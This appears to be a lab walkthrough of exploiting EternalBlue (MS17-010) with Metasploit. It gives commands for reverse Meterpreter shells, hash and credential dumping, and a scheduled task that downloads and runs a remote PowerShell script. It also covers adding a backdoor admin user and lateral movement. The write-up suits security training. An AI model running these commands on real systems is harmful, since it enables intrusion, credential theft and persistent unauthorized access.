Eternal Blue (ms17-010) — Full Walkthrough

EternalBlue (MS17‑010) — A Clean, Real-World Walkthrough

From host setup to exploitation and maintaining access — exactly how I work this box in a lab. No fluff. Every decision justified.

Vuln VM on VirtualBox Protocol: SMBv1 Exploit: MS17‑010 Post‑Ex: Meterpreter & Native

Overview

This post documents my exact process exploiting a Windows host vulnerable to MS17‑010 (EternalBlue). I hosted the machine on VirtualBox, verified reachability, enumerated SMB thoroughly, confirmed the vuln with nmap scripts, and executed the exploit using both Metasploit and a manual approach. I also cover maintaining access and proper cleanup. Treat this as a field-tested checklist you can adapt.

Legal: Only attack systems you own or have written permission to test. This lab is purely educational.

1) Lab Setup

Virtualization

• VirtualBox with two adapters: Host‑Only (for stable IPs) and NAT (optional for internet).
• Attacker: Kali/Parrot. Target: Windows vulnerable to SMBv1 (MS17‑010).

Connectivity Check

# Attacker
ip addr | grep -E "inet\s(192\.168|10\.|172\.)"
ping -c 2 <target-ip>
          

If ping is blocked, proceed with TCP checks (e.g., nc -vz <target-ip> 445).

2) Recon & Enumeration

A) Quick TCP sweep

nmap -Pn -sS -T4 -p- --min-rate 2000 -oN scan_full.txt <target-ip>

I want fast signal on exposed services. For EternalBlue, port 445/tcp must be open.

B) Service/Version + SMB vulns

nmap -sV -sC -p 139,445 --script smb-os-discovery,smb2-security-mode,smb2-time,smb2-capabilities,smb-vuln-ms17-010 -oN scan_smb.txt <target-ip>

Here I confirm SMBv1 and let smb-vuln-ms17-010 give me a straight answer.

C) SMB enumeration (users, shares)

# Anonymous share check
smbclient -L //<target-ip>/ -N

# Deeper enumeration
enum4linux -a <target-ip> | tee enum4linux.txt

If guest access is open, that’s a bonus path, but for EternalBlue we mainly need the vuln present on SMBv1.

3) Confirming MS17‑010

If the NSE script returns VULNERABLE, I still cross‑check with Metasploit’s auxiliary scanner to avoid false positives.

msfconsole -q
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS <target-ip>
run

Two independent checks reduce noise. If both say vulnerable, I proceed.

4) Exploitation (Metasploit route)

For reliability I use the 64‑bit payload when the target is 64‑bit Windows. If you’re unsure, start with Meterpreter x64 and fall back to x86 if needed.

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <target-ip>
set RPORT 445
set VERIFY_ARCH true
set VERIFY_TARGET true
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <attacker-ip>
set LPORT 4444
run

Tip: If you get “Exploit completed, but no session was created”, it’s almost always network/LHOST mismatch or wrong payload architecture. Try x86:

set payload windows/meterpreter/reverse_tcp
run

Post‑ex sanity checks

getuid
sysinfo
getprivs
net config workstation
ipconfig

5) Exploitation (Manual notes)

I keep a manual route handy for education and edge cases: send crafted SMB packets that trigger the pool overflow and drop a shell. In practice, most learners should stick to MSF for stability; manual PoCs are noisy and version‑sensitive. If you go manual, ensure:

• Correct OS build (Win7 SP1/2008 R2 are classic),
• SMBv1 enabled (no MS17‑010 patch),
• Proper architecture selection and reliable shellcode.

Manual EternalBlue PoCs can BSOD unstable targets. Use snapshots.

6) Immediate Looting

Hashes & Creds

# Meterpreter
hashdump
# Or migrate & use kiwi (if supported)
load kiwi
creds_all

Token & Privs

getprivs
whoami /all
# Useful tokens
tokens

Dumping hashes lets me move laterally or crack offline with hashcat.

7) Maintaining Access (Ethical Lab Only)

On a real engagement, persistence requires explicit approval and thorough documentation. In a lab, I demonstrate minimally invasive options and then remove them.

A) Meterpreter persistence (quick demo)

# In a Meterpreter session
run persistence -U -i 30 -p 4444 -r <attacker-ip>

Creates a user‑logon persistence that calls back every 30s. For modern OPSEC, I prefer native approaches:

B) Native schtasks + PowerShell one‑liner

# On the target (as SYSTEM/Administrator)
schtasks /Create /SC ONLOGON /TN Updater /TR "powershell -WindowStyle Hidden -c \"IEX(New-Object Net.WebClient).DownloadString('http://<attacker-ip>:8000/ps.ps1')\"" /RU SYSTEM /F

For the blog, I explicitly show how to remove persistence afterward.

C) Enable RDP & drop a user (lab‑only)

net user analyst P@ssw0rd! /add
net localgroup administrators analyst /add
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

8) Lateral Movement (Brief)

If I obtain domain creds or local admin hashes, I test neighboring hosts with SMB sessions, PSExec, or WMI:

# Using Impacket from attacker
psexec.py <domain/user>:'<pass or hash>'@<target2-ip>
wmiexec.py <domain/user>@<target2-ip> -hashes <LM:NT>

9) Cleanup

• Remove users you created; disable RDP if you enabled it.
• Delete dropped binaries/WARs/scripts and clear scheduled tasks.
• Close sessions, revert VM snapshots.

# Example cleanup
schtasks /Delete /TN Updater /F
net localgroup administrators analyst /del
net user analyst /del
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f

10) Troubleshooting Notes

• No session created? Validate LHOST is reachable from target; try x86 payload; check host firewall.
• Target BSODs? Your PoC/payload likely unstable; snapshot first and adjust.
• Script says vulnerable but exploit fails? Host may be partially patched or third‑party AV interferes.

Key Takeaways

• Independent confirmation beats rushing to exploit.
• Payload architecture + network reachability decide success more often than “magic” modules.
• Persistence is a discipline—prove it works, then clean up.

Medium Blog:

Eternal Blue (ms17–010) — Full Walkthrough

© Vaibhav Mulak — CTF Writeups. Crafted for practitioners who care about doing things right.